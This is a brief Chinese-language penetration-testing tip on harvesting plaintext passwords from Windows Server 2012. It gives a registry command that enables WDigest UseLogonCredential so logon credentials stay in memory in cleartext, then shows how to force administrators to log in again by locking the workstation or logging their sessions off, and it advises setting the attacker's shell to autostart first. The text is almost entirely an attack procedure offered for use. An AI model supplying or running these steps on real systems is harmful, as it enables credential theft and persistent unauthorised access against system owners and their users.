windows2012获取明文密码
windows 2012获取明文密码
导hash的话用常规的方法就可以。
修改注册表
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1
选项一:锁屏
rundll32.exe user32.dll,LockWorkStation
选项二:注销
查询已登录用户的会话ID
query user
把你想抓的那个管理员注销掉或者把所有在线用户全部注销掉,注意:可能会导致shell无法访问,执行前先给shell加个自启动
logoff ID